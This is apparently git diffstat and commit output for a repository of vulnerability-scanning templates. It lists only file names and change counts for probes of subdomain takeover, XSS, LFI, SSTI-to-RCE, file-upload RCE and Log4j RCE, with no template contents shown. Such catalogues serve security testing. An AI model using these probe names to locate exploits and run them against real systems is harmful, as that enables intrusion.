poc/subdomain_takeover/landingi-takeover.yaml | 5 +-
.../launchrock-takeover-8602.yaml | 16 -
.../launchrock-takeover-8603.yaml | 3 +-
.../launchrock-takeover-8605.yaml | 18 -
.../mashery-takeover-8785.yaml | 2 +-
poc/subdomain_takeover/medium-takeover.yaml | 7 +-
.../ngrok-takeover-9126.yaml | 16 -
.../ngrok-takeover-9128.yaml | 16 +
.../pantheon-takeover-9458.yaml | 3 +-
.../pantheon-takeover-9459.yaml | 19 -
.../pingdom-takeover-9584.yaml | 16 -
.../pingdom-takeover-9586.yaml | 16 +
.../pingdom-takeover-9587.yaml | 2 +-
.../proposify-takeover-9695.yaml | 15 -
.../proposify-takeover-9696.yaml | 18 +
.../proposify-takeover.yaml | 7 +-
.../readme-takeover-9842.yaml | 19 +
poc/subdomain_takeover/readme-takeover.yaml | 20 +-
.../readthedocs-takeover-9844.yaml | 18 -
.../readthedocs-takeover-9845.yaml | 8 +-
.../readthedocs-takeover-9846.yaml | 15 +
.../readthedocs-takeover-9847.yaml | 7 +-
.../s3-subtakeover-9968.yaml | 20 -
.../s3-subtakeover-9969.yaml | 24 +
.../shopify-takeover-10201.yaml | 26 -
.../shopify-takeover-10202.yaml | 12 +-
.../shopify-takeover-10204.yaml | 11 +-
poc/subdomain_takeover/short-io-takeover.yaml | 15 +-
.../simplebooklet-takeover-10272.yaml | 19 -
.../simplebooklet-takeover-10274.yaml | 18 +
...0324.yaml => smartjob-takeover-10322.yaml} | 0
...326.yaml => smartling-takeover-10327.yaml} | 0
.../smartling-takeover.yaml | 4 +-
.../smugmug-takeover-10338.yaml | 19 -
.../smugmug-takeover-10339.yaml | 15 +
.../smugmug-takeover-10340.yaml | 7 +-
.../sprintful-takeover-10495.yaml | 7 +-
.../sprintful-takeover.yaml | 21 +-
.../strikingly-takeover-10550.yaml | 10 +-
.../strikingly-takeover-10551.yaml | 17 +
.../strikingly-takeover.yaml | 22 +-
.../subdomain-takeover-dns-wildcards.yaml | 4 +-
.../subdomain-takeover-dns.yaml | 4 +-
.../surge-takeover-10578.yaml | 18 -
.../surveygizmo-takeover-10583.yaml | 5 +-
.../surveygizmo-takeover.yaml | 14 +-
.../tave-takeover-10660.yaml | 16 +
.../tave-takeover-10662.yaml | 18 -
...0670.yaml => teamwork-takeover-10668.yaml} | 0
.../tictail-takeover-10766.yaml | 17 +
.../tictail-takeover-10767.yaml | 18 -
...r-10781.yaml => tilda-takeover-10783.yaml} | 0
.../tilda-takeover-10784.yaml | 6 +-
.../tumblr-takeover-10845.yaml | 17 +
.../tumblr-takeover-10847.yaml | 24 -
poc/subdomain_takeover/tumblr-takeover.yaml | 26 +-
.../uberflip-takeover-10864.yaml | 5 +-
...0971.yaml => unbounce-takeover-10970.yaml} | 0
poc/subdomain_takeover/unbounce-takeover.yaml | 33 +-
...9.yaml => uptimerobot-takeover-10987.yaml} | 0
.../uptimerobot-takeover-10988.yaml | 16 +-
poc/subdomain_takeover/urge-takeover.yaml | 7 +-
.../vend-takeover-10996.yaml | 15 -
.../vend-takeover-10998.yaml | 15 +
.../vend-takeover-10999.yaml | 5 +-
.../vercel-takeover-11000.yaml | 17 +
.../vercel-takeover-11001.yaml | 17 -
poc/subdomain_takeover/vercel-takeover.yaml | 31 +-
.../webflow-takeover-11131.yaml | 15 -
.../webflow-takeover-11133.yaml | 15 +
poc/subdomain_takeover/webflow-takeover.yaml | 2 +-
.../wishpond-takeover-11216.yaml | 16 +
.../wishpond-takeover-11217.yaml | 15 -
.../wix-takeover-11219.yaml | 5 +-
.../wordpress-takeover-11311.yaml | 6 +-
.../wordpress-takeover-11312.yaml | 23 +
.../wordpress-takeover-11313.yaml | 22 -
.../worksites-takeover.yaml | 45 +-
.../wufoo-takeover-11648.yaml | 17 +
.../wufoo-takeover-11649.yaml | 18 -
.../zendesk-takeover-11780.yaml | 15 -
.../zendesk-takeover-11781.yaml | 16 +
poc/subdomain_takeover/zendesk-takeover.yaml | 27 +-
.../pdf-signer-ssti-to-rce-9470.yaml | 20 +
.../pdf-signer-ssti-to-rce-9471.yaml | 3 +-
.../pdf-signer-ssti-to-rce-9472.yaml | 22 -
poc/template_injection/pikpikcussti.yaml | 25 +
poc/template_injection/ssti.yaml | 3 -
.../twig-php-ssti-10856.yaml | 15 +
.../twig-php-ssti-10859.yaml | 1 -
.../dahua-wpms-addimgico-fileupload.yaml | 78 +-
.../exposed-jquery-file-upload-7313.yaml | 25 +-
poc/upload/exposed-jquery-file-upload.yaml | 22 -
...9190.yaml => oa-v9-uploads-file-9191.yaml} | 0
...file-9189.yaml => oa-v9-uploads-file.yaml} | 0
poc/upload/showdoc-file-upload-rce-10227.yaml | 40 +
.../telerik-fileupload-detect-10692.yaml | 13 +-
poc/upload/ueditor-file-upload-10872.yaml | 3 +-
poc/upload/ueditor-file-upload-10875.yaml | 1 +
.../unauthenticated-popup-upload-10921.yaml | 21 +
...yaml => unauthenticated-popup-upload.yaml} | 0
poc/upload/wp-upload-data-11605.yaml | 5 -
...n-11041.yaml => vmware-horizon-11040.yaml} | 0
.../vmware-horizon-log4j-jndi-rce-11034.yaml | 21 +-
poc/vmware/vmware-horizon-log4j-jndi-rce.yaml | 32 +
poc/vmware/vmware-vcenter-lfi-11047.yaml | 41 -
.../vmware-vcenter-lfi-linux-11042.yaml | 2 +-
poc/vmware/vmware-vcenter-lfi.yaml | 27 +
poc/vmware/vmware-vcenter-ssrf-11051.yaml | 19 +-
poc/vmware/vmware-vcenter-ssrf-11052.yaml | 16 +-
poc/vmware/vmware-vrealize-detect-11058.yaml | 8 +-
...11057.yaml => vmware-vrealize-detect.yaml} | 0
...-11059.yaml => vmware-workflow-11060.yaml} | 0
poc/vmware/vmware-workflow.yaml | 11 +
poc/web/alphaweb-default-login.yaml | 35 -
poc/web/artica-web-proxy-detect-544.yaml | 8 +-
poc/web/artica-web-proxy-detect-545.yaml | 22 -
...-543.yaml => artica-web-proxy-detect.yaml} | 0
poc/web/axigen-webadmin-659.yaml | 16 +-
poc/web/axigen-webadmin-660.yaml | 24 -
poc/web/axigen-webmail.yaml | 43 -
poc/web/azkaban-web-client-676.yaml | 32 -
poc/web/azkaban-web-client-680.yaml | 30 +
poc/web/boa-web-fileread-11846.yaml | 22 +
poc/web/boa-web-server.yaml | 38 +
poc/web/cobbler-webgui-1123.yaml | 31 +
poc/web/cobbler-webgui-1124.yaml | 31 -
poc/web/codemeter-webadmin-panel-1135.yaml | 21 +
poc/web/codemeter-webadmin-panel-1138.yaml | 31 -
poc/web/codemeter-webadmin-panel.yaml | 20 +-
poc/web/dixell-xweb500-filewrite-7018.yaml | 14 +-
poc/web/dixell-xweb500-filewrite-7020.yaml | 11 +-
poc/web/epson-web-control-detect-7239.yaml | 13 +-
poc/web/epson-web-control-detect-7242.yaml | 10 +-
poc/web/exposed-webalizer-7358.yaml | 18 +
poc/web/exposed-webalizer-7360.yaml | 18 -
.../fingerprinthub-web-fingerprints-7481.yaml | 3068 +-
poc/web/fingerprinthub-web-fingerprints.yaml | 2992 +-
poc/web/geovision-geowebserver-lfi-7595.yaml | 20 +-
poc/web/geovision-geowebserver-lfi-7596.yaml | 17 +-
poc/web/git-web-interface.yaml | 11 +-
poc/web/hashicorp-consul-webgui-7896.yaml | 32 +
poc/web/hashicorp-consul-webgui-7898.yaml | 2 +-
poc/web/honeywell-web-controller-7996.yaml | 23 -
poc/web/honeywell-web-controller.yaml | 18 +-
poc/web/icewarp-webclient-rce-8133.yaml | 25 -
poc/web/icinga-web-login-8134.yaml | 22 +
poc/web/icinga-web-login-8137.yaml | 23 -
poc/web/icinga-web-login.yaml | 13 +-
poc/web/iplanet-web-server-8190.yaml | 21 -
poc/web/iplanet-web-server-8191.yaml | 21 +
poc/web/iplanet-web-server.yaml | 4 +-
poc/web/keenetic-web-login-8442.yaml | 19 +
poc/web/keenetic-web-login-8443.yaml | 22 -
poc/web/microweber-detect-8863.yaml | 5 +-
poc/web/microweber-detect.yaml | 14 +-
poc/web/microweber-xss.yaml | 7 +-
poc/web/oracle-iplanet-web-server-9392.yaml | 28 +
poc/web/oracle-iplanet-web-server.yaml | 21 -
poc/web/r-webserver-login.yaml | 22 +-
poc/web/saia-web-server-info-9979.yaml | 3 +-
poc/web/saia-web-server-info.yaml | 20 +
poc/web/sap-netweaver-webgui.yaml | 20 -
poc/web/sap-web-dispatcher-10078.yaml | 9 +-
...sap-web-dispatcher-admin-portal-10071.yaml | 32 +
poc/web/slack-webhook(1).yaml | 16 +
poc/web/slack-webhook-11865.yaml | 13 -
poc/web/slack-webhook.yaml | 4 -
poc/web/spark-webui-unauth-10401.yaml | 26 +
poc/web/spark-webui-unauth.yaml | 15 +-
poc/web/synology-web-station-10631.yaml | 19 +-
poc/web/synology-web-station-10632.yaml | 18 +-
poc/web/web-config-11125.yaml | 24 -
poc/web/web-ftp-detect-11136.yaml | 28 -
poc/web/web-ftp-detect-11137.yaml | 43 +-
poc/web/web-local-craft-11139.yaml | 19 +
poc/web/web-local-craft-11141.yaml | 20 -
poc/web/web-service-panel.yaml | 22 +-
poc/web/web-suite-detect-11168.yaml | 36 +
poc/web/web-suite-detect.yaml | 31 -
poc/web/webcamxp-5-11122.yaml | 34 -
poc/web/webcamxp-5.yaml | 21 +
poc/web/webeditors-11129.yaml | 28 -
poc/web/webflow-takeover-11131.yaml | 15 -
poc/web/webflow-takeover-11133.yaml | 15 +
poc/web/webflow-takeover.yaml | 2 +-
poc/web/weblogic-iiop-detect-11148.yaml | 4 -
poc/web/weblogic-t3-detect-11151.yaml | 23 +-
...152.yaml => weblogic-t3-detect-11153.yaml} | 0
poc/web/weblogic-weak-login-11154.yaml | 68 -
poc/web/weblogic-weak-login-11155.yaml | 14 +-
poc/web/webmodule-ee-11162.yaml | 19 +
poc/web/webmodule-ee-11164.yaml | 22 -
...160.yaml => webmodule-ee-panel-11161.yaml} | 0
poc/web/webmodule-ee.yaml | 2 +
poc/web/webtools-home.yaml | 13 +-
poc/web/webui-rce-11170.yaml | 21 -
poc/web/webui-rce-11174.yaml | 20 +
poc/web/webui-rce.yaml | 1 +
...webview-addjavascript-interface-11175.yaml | 5 +-
...ebview-addjavascript-interface-11176.yaml} | 0
poc/web/webview-javascript.yaml | 11 +-
poc/web/webview-load-url-11180.yaml | 13 +
poc/web/webview-load-url-11182.yaml | 12 -
poc/web/webview-universal-access-11183.yaml | 5 +-
poc/web/webview-universal-access.yaml | 14 +-
poc/web/xp-webcam.yaml | 22 -
poc/web/zoho-webhook-token-11835.yaml | 2 +-
poc/wordpress/alfacgiapi-wordpress-256.yaml | 62 +-
poc/wordpress/alfacgiapi-wordpress.yaml | 33 -
.../dahua-wpms-addimgico-fileupload.yaml | 78 +-
poc/wordpress/easy-wp-smtp-listing-7156.yaml | 19 +
poc/wordpress/easy-wp-smtp-listing-7157.yaml | 21 -
poc/wordpress/easy-wp-smtp-listing.yaml | 5 +-
poc/wordpress/feedwordpress-xss-7459.yaml | 35 +
.../nativechurch-wp-theme-lfd-9001.yaml | 26 -
.../nativechurch-wp-theme-lfd-9002.yaml | 14 +-
.../trilithic-viewpoint-default-10835.yaml | 39 -
.../viewpoint-system-status-11018.yaml | 8 +-
.../viewpoint-system-status-11019.yaml | 20 -
poc/wordpress/wordpress-LFI.yaml | 6 +-
.../wordpress-accessible-wpconfig-11235.yaml | 38 -
.../wordpress-accessible-wpconfig-11238.yaml | 12 +-
.../wordpress-affiliatewp-log-11240.yaml | 23 -
.../wordpress-affiliatewp-log-11242.yaml | 23 +
poc/wordpress/wordpress-affiliatewp-log.yaml | 11 +-
...ordpress-bbpress-plugin-listing-11245.yaml | 3 +-
.../wordpress-bbpress-plugin-listing.yaml | 23 +
poc/wordpress/wordpress-db-repair-11252.yaml | 35 +
...58.yaml => wordpress-debug-log-11259.yaml} | 0
...11261.yaml => wordpress-detect-11260.yaml} | 0
poc/wordpress/wordpress-detect.yaml | 57 +-
.../wordpress-directory-listing-11266.yaml | 10 +-
...ls-verification-for-woocommerce-11271.yaml | 25 +-
.../wordpress-emergency-script-11272.yaml | 24 -
.../wordpress-emergency-script-11275.yaml | 24 +
.../wordpress-emergency-script-11277.yaml | 6 +-
poc/wordpress/wordpress-emergency-script.yaml | 14 +-
poc/wordpress/wordpress-git-config-11278.yaml | 26 -
poc/wordpress/wordpress-git-config-11279.yaml | 16 +-
.../wordpress-gotmls-detect-11280.yaml | 30 -
poc/wordpress/wordpress-gotmls-detect.yaml | 20 +-
...ress-gtranslate-plugin-listing-11282.yaml} | 0
.../wordpress-gtranslate-plugin-listing.yaml | 22 -
...ordpress-infinitewp-auth-bypass-11287.yaml | 21 +-
...ordpress-infinitewp-auth-bypass-11288.yaml | 60 -
...aml => wordpress-installer-log-11292.yaml} | 0
poc/wordpress/wordpress-installer-log.yaml | 12 +-
poc/wordpress/wordpress-lfi.yaml | 21 -
poc/wordpress/wordpress-login.yaml | 16 +-
.../wordpress-plugins-detect-11298.yaml | 8 +-
poc/wordpress/wordpress-plugins-detect.yaml | 30 +-
.../wordpress-rce-simplefilelist-11299.yaml | 35 +-
.../wordpress-rce-simplefilelist-11304.yaml | 18 +-
...ress-redirection-plugin-listing-11306.yaml | 22 -
...ess-redirection-plugin-listing-11308.yaml} | 0
poc/wordpress/wordpress-takeover-11311.yaml | 6 +-
poc/wordpress/wordpress-takeover-11312.yaml | 23 +
poc/wordpress/wordpress-takeover-11313.yaml | 22 -
.../wordpress-themes-detect-11316.yaml | 22 +
poc/wordpress/wordpress-themes-detect.yaml | 22 +-
poc/wordpress/wordpress-themes2.yaml | 11 +-
...s-total-upkeep-backup-download-11324.yaml} | 0
...ordpress-total-upkeep-backup-download.yaml | 13 +-
.../wordpress-updraftplus-pem-key.yaml | 12 +-
poc/wordpress/wordpress-user-enum-11330.yaml | 11 +-
.../wordpress-weak-credentials-11336.yaml | 43 +
.../wordpress-weak-credentials-11337.yaml | 37 -
poc/wordpress/wordpress-weak-credentials.yaml | 17 +-
.../wordpress-woocommerce-listing-11338.yaml | 7 +-
.../wordpress-woocommerce-listing-11339.yaml | 22 -
.../wordpress-woocommerce-listing-11341.yaml | 23 +
.../wordpress-woocommerce-sqli-11342.yaml | 6 +-
.../wordpress-woocommerce-sqli-11345.yaml | 44 -
poc/wordpress/wordpress-woosidebars.yaml | 49 -
.../wordpress-wordfence-lfi-11346.yaml | 21 +
.../wordpress-wordfence-lfi-11348.yaml | 4 +-
.../wordpress-wordfence-lfi-11350.yaml | 21 -
...dpress-wordfence-waf-bypass-xss-11353.yaml | 23 +-
...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +-
...dpress-wordfence-waf-bypass-xss-11356.yaml | 25 -
.../wordpress-wordfence-xss-11359.yaml | 8 +-
poc/wordpress/wordpress-workflow-11363.yaml | 14 -
poc/wordpress/wordpress-workflow-11365.yaml | 29 +
poc/wordpress/wordpress-workflow.yaml | 23 +-
...press-wpcourses-info-disclosure-11369.yaml | 34 +
...press-wpcourses-info-disclosure-11371.yaml | 36 -
.../wordpress-wpcourses-info-disclosure.yaml | 13 +-
.../wordpress-xmlrpc-listmethods-11372.yaml | 23 -
...> wordpress-xmlrpc-listmethods-11374.yaml} | 0
.../wordpress-zebra-form-xss-11378.yaml | 40 -
.../wordpress-zebra-form-xss-11379.yaml | 38 +
poc/wordpress/wordpress-zebra-form-xss.yaml | 35 +-
poc/wordpress/wordpress.yaml | 52062 +++++++++++
poc/wordpress/wp-ambience-xss-11407.yaml | 24 +
poc/wordpress/wp-arforms-listing-11415.yaml | 31 +
poc/wordpress/wp-code-snippets-xss-11426.yaml | 19 +-
...s-11425.yaml => wp-code-snippets-xss.yaml} | 0
poc/wordpress/wp-config-setup.yaml | 15 +-
poc/wordpress/wp-custom-tables-xss-11433.yaml | 26 +
poc/wordpress/wp-custom-tables-xss-11434.yaml | 25 -
poc/wordpress/wp-custom-tables-xss-11435.yaml | 8 +-
poc/wordpress/wp-debug-log.yaml | 58 +-
.../wp-email-subscribers-listing-11443.yaml | 3 +-
.../wp-email-subscribers-listing.yaml | 23 -
poc/wordpress/wp-finder-xss-11445.yaml | 24 -
poc/wordpress/wp-finder-xss-11448.yaml | 7 +-
poc/wordpress/wp-flagem-xss-11454.yaml | 5 +
poc/wordpress/wp-force-ssl.yaml | 59 +
.../wp-full-path-disclosure-11455.yaml | 16 +
.../wp-full-path-disclosure-11457.yaml | 18 -
poc/wordpress/wp-full-path-disclosure.yaml | 9 +-
.../wp-grimag-open-redirect-11458.yaml | 17 +
.../wp-grimag-open-redirect-11461.yaml | 9 +-
.../wp-grimag-open-redirect-11462.yaml | 26 +-
...=> wp-gtranslate-open-redirect-11463.yaml} | 0
.../wp-gtranslate-open-redirect-11465.yaml | 22 -
poc/wordpress/wp-haberadam-idor.yaml | 18 +-
...stall-11475.yaml => wp-install-11473.yaml} | 0
poc/wordpress/wp-install.yaml | 22 +
.../wp-iwp-client-listing-11478.yaml | 14 +-
.../wp-iwp-client-listing-11479.yaml | 17 +-
poc/wordpress/wp-javospot-lfi-11482.yaml | 38 +
poc/wordpress/wp-javospot-lfi.yaml | 26 -
poc/wordpress/wp-knews-xss-11487.yaml | 25 -
poc/wordpress/wp-knews-xss-11488.yaml | 29 +
.../wp-mailchimp-log-exposure-11494.yaml | 2 +-
...p-memphis-documents-library-lfi-11495.yaml | 38 +
...p-memphis-documents-library-lfi-11496.yaml | 4 +-
.../wp-mstore-plugin-listing-11500.yaml | 30 +
.../wp-multiple-theme-ssrf-11512.yaml | 4 -
.../wp-multiple-theme-ssrf-11513.yaml | 27 +
poc/wordpress/wp-nextgen-xss-11516.yaml | 2 +-
poc/wordpress/wp-phpfreechat-xss-11524.yaml | 24 -
poc/wordpress/wp-phpfreechat-xss-11527.yaml | 8 +-
poc/wordpress/wp-phpfreechat-xss-11528.yaml | 2 +-
...p-plugin-1-flashgallery-listing-11530.yaml | 27 +
... => wp-plugin-1-flashgallery-listing.yaml} | 0
.../wp-plugin-utlimate-member-11541.yaml | 7 +-
...l => wp-plugin-utlimate-member-11542.yaml} | 0
...sting.yaml => wp-popup-listing-11543.yaml} | 0
poc/wordpress/wp-popup-listing-11545.yaml | 10 +-
.../wp-prostore-open-redirect-11546.yaml | 17 -
.../wp-prostore-open-redirect-11549.yaml | 14 +-
.../wp-prostore-open-redirect-11550.yaml | 20 +
poc/wordpress/wp-qards-listing-11552.yaml | 21 -
poc/wordpress/wp-qards-listing.yaml | 25 +
.../wp-revslider-file-download-11554.yaml | 29 +
poc/wordpress/wp-revslider-file-download.yaml | 14 +-
poc/wordpress/wp-securimage-xss-11556.yaml | 24 +
poc/wordpress/wp-securimage-xss-11559.yaml | 2 +-
poc/wordpress/wp-securimage-xss-11560.yaml | 25 -
...62.yaml => wp-sfwd-lms-listing-11564.yaml} | 0
poc/wordpress/wp-sfwd-lms-listing-11565.yaml | 3 +-
poc/wordpress/wp-simple-fields-lfi-11566.yaml | 19 +-
poc/wordpress/wp-simple-fields-lfi-11569.yaml | 20 -
poc/wordpress/wp-slideshow-xss-11572.yaml | 28 -
poc/wordpress/wp-slideshow-xss-11574.yaml | 29 +
poc/wordpress/wp-socialfit-xss-11577.yaml | 4 +-
poc/wordpress/wp-super-forms-11585.yaml | 19 +-
poc/wordpress/wp-super-forms-11588.yaml | 17 +-
poc/wordpress/wp-tinymce-lfi.yaml | 10 +-
poc/wordpress/wp-tutor-lfi-11596.yaml | 17 +-
...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0
poc/wordpress/wp-upload-data-11605.yaml | 5 -
poc/wordpress/wp-vault-lfi-11610.yaml | 4 +-
.../wp-vault-local-file-inclusion.yaml | 33 +
poc/wordpress/wp-whmcs-xss-11614.yaml | 37 +
poc/wordpress/wp-whmcs-xss.yaml | 8 +-
...-woocommerce-email-verification-11619.yaml | 47 +-
.../wp-woocommerce-file-download-11620.yaml | 38 +
.../wp-woocommerce-file-download.yaml | 25 -
.../wp-xmlrpc-brute-force-11623.yaml | 2 +-
.../wp-xmlrpc-pingback-detection.yaml | 11 +-
poc/wordpress/wpdm-cache-session-11436.yaml | 23 +
poc/wordpress/wpdm-cache-session-11438.yaml | 24 -
poc/wordpress/wpengine-config-check.yaml | 22 -
.../wptouch-open-redirect-11592.yaml | 24 +
.../wptouch-open-redirect-11595.yaml | 23 +-
.../wptouch-plugin-open-redirect.yaml | 13 +-
...pringboot-actuators-jolokia-xxe-10430.yaml | 28 +
...pringboot-actuators-jolokia-xxe-10431.yaml | 31 -
poc/xss/aem-setpreferences-xss.yaml | 30 -
...ml => aem-xss-childlist-selector-198.yaml} | 0
poc/xss/aem-xss-childlist-selector.yaml | 37 -
poc/xss/basic-xss-prober-698.yaml | 35 -
poc/xss/blind-xss-user-agent.yaml | 79 +-
poc/xss/blind-xss.yaml | 16 +-
poc/xss/ckan-dom-based-xss-992.yaml | 39 +-
poc/xss/ckan-dom-based-xss-993.yaml | 42 +-
poc/xss/coldfusion-debug-xss-1153.yaml | 31 +
poc/xss/coldfusion-debug-xss.yaml | 34 -
poc/xss/concrete-xss-1178.yaml | 35 +
...ncrete-xss-1177.yaml => concrete-xss.yaml} | 0
poc/xss/discourse-xss-7014.yaml | 4 +-
poc/xss/elex-woocommerce-xss-7199.yaml | 47 -
poc/xss/elex-woocommerce-xss.yaml | 35 +
...recms-xss.yaml => empirecms-xss-7218.yaml} | 0
poc/xss/empirecms-xss-7220.yaml | 25 -
poc/xss/feedwordpress-xss-7459.yaml | 35 +
poc/xss/flow-flow-social-stream-xss-7524.yaml | 41 +
poc/xss/flow-flow-social-stream-xss.yaml | 27 -
...fuzzing-xss-get-params-html-injection.yaml | 8 +-
poc/xss/global-domains-xss.yaml | 3 +-
poc/xss/header_blind_xss-7914.yaml | 14 +-
poc/xss/httpbin-xss-8052.yaml | 22 +-
poc/xss/id-q-xss.yaml | 4 +
poc/xss/kafdrop-xss-8411.yaml | 23 -
poc/xss/kafdrop-xss-8414.yaml | 24 +-
poc/xss/keycloak-xss-8481.yaml | 5 +-
poc/xss/keycloak-xss-8482.yaml | 9 +-
poc/xss/laravel-ignition-xss-8593.yaml | 18 +-
poc/xss/laravel-ignition-xss.yaml | 30 +
poc/xss/microweber-xss.yaml | 7 +-
poc/xss/mida-eframework-xss-8868.yaml | 7 +-
poc/xss/mida-eframework-xss.yaml | 24 +
poc/xss/moodle-filter-jmol-xss-8942.yaml | 13 +-
poc/xss/moodle-filter-jmol-xss-8946.yaml | 18 -
poc/xss/moodle-xss-8950.yaml | 33 -
poc/xss/moodle-xss-8952.yaml | 12 +-
poc/xss/my-chatbot-xss.yaml | 13 +-
poc/xss/oracle-ebs-xss-9373.yaml | 29 +
poc/xss/oracle-ebs-xss-9376.yaml | 33 -
poc/xss/oracle-ebs-xss-9377.yaml | 6 +-
poc/xss/oracle-siebel-xss-9400.yaml | 25 +-
poc/xss/oracle-siebel-xss-9402.yaml | 10 +-
poc/xss/parentlink-xss-9467.yaml | 32 +
poc/xss/parentlink-xss.yaml | 26 +
poc/xss/php-timeclock-xss-9552.yaml | 19 +-
poc/xss/php-timeclock-xss-9553.yaml | 45 +-
poc/xss/qcubed-xss-9749.yaml | 42 -
poc/xss/qcubed-xss.yaml | 27 +
poc/xss/rails6-xss-9797.yaml | 17 +-
poc/xss/rails6-xss-9798.yaml | 29 +-
poc/xss/rockmongo-xss-9902.yaml | 28 -
poc/xss/rockmongo-xss-9904.yaml | 23 +-
.../nuclei_template.yaml => xss/rxss.yaml} | 0
poc/xss/samsung-wlan-ap-xss-10012.yaml | 25 +
poc/xss/samsung-wlan-ap-xss.yaml | 24 -
poc/xss/sniplets-xss.yaml | 10 +-
poc/xss/squirrelmail-add-xss-10515.yaml | 39 +
poc/xss/squirrelmail-add-xss.yaml | 25 -
poc/xss/thruk-xss-10758.yaml | 8 +-
poc/xss/thruk-xss-10759.yaml | 29 +
poc/xss/top-xss-params-10807.yaml | 75 +
poc/xss/top-xss-params-10809.yaml | 81 -
poc/xss/turbocrm-xss-10848.yaml | 24 +-
poc/xss/turbocrm-xss-10851.yaml | 23 +-
poc/xss/vanguard-post-xss-10992.yaml | 21 +-
poc/xss/vanguard-post-xss-10994.yaml | 23 +-
...r-xss.yaml => wems-manager-xss-11192.yaml} | 0
poc/xss/wems-manager-xss-11194.yaml | 21 +-
poc/xss/window-name-domxss-11213.yaml | 81 +
poc/xss/window-name-domxss.yaml | 80 -
...dpress-wordfence-waf-bypass-xss-11353.yaml | 23 +-
...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +-
...dpress-wordfence-waf-bypass-xss-11356.yaml | 25 -
poc/xss/wordpress-wordfence-xss-11359.yaml | 8 +-
poc/xss/wordpress-zebra-form-xss-11378.yaml | 40 -
poc/xss/wordpress-zebra-form-xss-11379.yaml | 38 +
poc/xss/wordpress-zebra-form-xss.yaml | 35 +-
poc/xss/wp-ambience-xss-11407.yaml | 24 +
poc/xss/wp-code-snippets-xss-11426.yaml | 19 +-
...s-11425.yaml => wp-code-snippets-xss.yaml} | 0
poc/xss/wp-custom-tables-xss-11433.yaml | 26 +
poc/xss/wp-custom-tables-xss-11434.yaml | 25 -
poc/xss/wp-custom-tables-xss-11435.yaml | 8 +-
poc/xss/wp-finder-xss-11445.yaml | 24 -
poc/xss/wp-finder-xss-11448.yaml | 7 +-
poc/xss/wp-flagem-xss-11454.yaml | 5 +
poc/xss/wp-knews-xss-11487.yaml | 25 -
poc/xss/wp-knews-xss-11488.yaml | 29 +
poc/xss/wp-nextgen-xss-11516.yaml | 2 +-
poc/xss/wp-phpfreechat-xss-11524.yaml | 24 -
poc/xss/wp-phpfreechat-xss-11527.yaml | 8 +-
poc/xss/wp-phpfreechat-xss-11528.yaml | 2 +-
poc/xss/wp-securimage-xss-11556.yaml | 24 +
poc/xss/wp-securimage-xss-11559.yaml | 2 +-
poc/xss/wp-securimage-xss-11560.yaml | 25 -
poc/xss/wp-slideshow-xss-11572.yaml | 28 -
poc/xss/wp-slideshow-xss-11574.yaml | 29 +
poc/xss/wp-socialfit-xss-11577.yaml | 4 +-
poc/xss/wp-whmcs-xss-11614.yaml | 37 +
poc/xss/wp-whmcs-xss.yaml | 8 +-
5021 files changed, 255291 insertions(+), 71831 deletions(-)
delete mode 100644 poc/adobe/adobe-coldfusion-detect-82.yaml
create mode 100644 poc/adobe/adobe-coldfusion-error-detect-86.yaml
rename poc/adobe/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%)
create mode 100644 poc/adobe/adobe-component-login-89.yaml
delete mode 100644 poc/adobe/adobe-component-login-90.yaml
create mode 100644 poc/adobe/adobe-component-login-91.yaml
rename poc/adobe/{adobe-connect-central-login-93.yaml => adobe-connect-central-login-96.yaml} (100%)
delete mode 100644 poc/adobe/adobe-connect-username-exposure-100.yaml
delete mode 100644 poc/adobe/adobe-connect-version-104.yaml
rename poc/adobe/{adobe-connect-version-102.yaml => adobe-connect-version.yaml} (100%)
delete mode 100644 poc/adobe/adobe-experience-manager-login-105.yaml
create mode 100644 poc/adobe/adobe-experience-manager-login-106.yaml
create mode 100644 poc/adobe/adobe-media-server-114.yaml
delete mode 100644 poc/adobe/adobe-media-server.yaml
delete mode 100644 poc/adobe/aem-bg-servlet-129.yaml
create mode 100644 poc/adobe/aem-bg-servlet.yaml
rename poc/adobe/{aem-default-get-servlet-137.yaml => aem-default-get-servlet-135.yaml} (100%)
delete mode 100644 poc/adobe/aem-default-login-140.yaml
delete mode 100644 poc/adobe/aem-gql-servlet-149.yaml
create mode 100644 poc/adobe/aem-gql-servlet-150.yaml
delete mode 100644 poc/adobe/aem-groovyconsole-154.yaml
delete mode 100644 poc/adobe/aem-jcr-querybuilder-162.yaml
create mode 100644 poc/adobe/aem-jcr-querybuilder-165.yaml
rename poc/adobe/{aem-login-status-169.yaml => aem-login-status-167.yaml} (100%)
delete mode 100644 poc/adobe/aem-merge-metadata-servlet-174.yaml
create mode 100644 poc/adobe/aem-querybuilder-internal-path-read-179.yaml
delete mode 100644 poc/adobe/aem-querybuilder-internal-path-read-180.yaml
create mode 100644 poc/adobe/aem-secrets.yaml
delete mode 100644 poc/adobe/aem-setpreferences-xss.yaml
delete mode 100644 poc/adobe/aem-userinfo-servlet-192.yaml
create mode 100644 poc/adobe/aem-userinfo-servlet-193.yaml
rename poc/adobe/{aem-xss-childlist-selector-197.yaml => aem-xss-childlist-selector-198.yaml} (100%)
delete mode 100644 poc/adobe/aem-xss-childlist-selector.yaml
delete mode 100644 poc/adobe/possible-AEM-secrets.yaml
create mode 100644 poc/airflow/airflow-configuration-exposure-230.yaml
delete mode 100644 poc/airflow/airflow-configuration-exposure.yaml
create mode 100644 poc/airflow/airflow-debug-231.yaml
delete mode 100644 poc/airflow/airflow-debug-233.yaml
delete mode 100644 poc/airflow/airflow-detect-239.yaml
create mode 100644 poc/airflow/airflow-detect-240.yaml
create mode 100644 poc/airflow/airflow-panel-242.yaml
rename poc/airflow/{airflow-panel-241.yaml => airflow-panel-244.yaml} (100%)
create mode 100644 poc/airflow/unauthenticated-airflow-10884.yaml
delete mode 100644 poc/airflow/unauthenticated-airflow-10886.yaml
create mode 100644 poc/apache/apache-answer-detect.yaml
delete mode 100644 poc/apache/apache-apisix-panel-337.yaml
create mode 100644 poc/apache/apache-apisix-panel-338.yaml
create mode 100644 poc/apache/apache-axis-detect-339.yaml
rename poc/apache/{apache-axis-detect.yaml => apache-axis-detect-341.yaml} (100%)
delete mode 100644 poc/apache/apache-cocoon-detect-342.yaml
create mode 100644 poc/apache/apache-cocoon-detect.yaml
rename poc/apache/{apache-detect.yaml => apache-detect-346.yaml} (100%)
delete mode 100644 poc/apache/apache-flink-unauth-rce-355.yaml
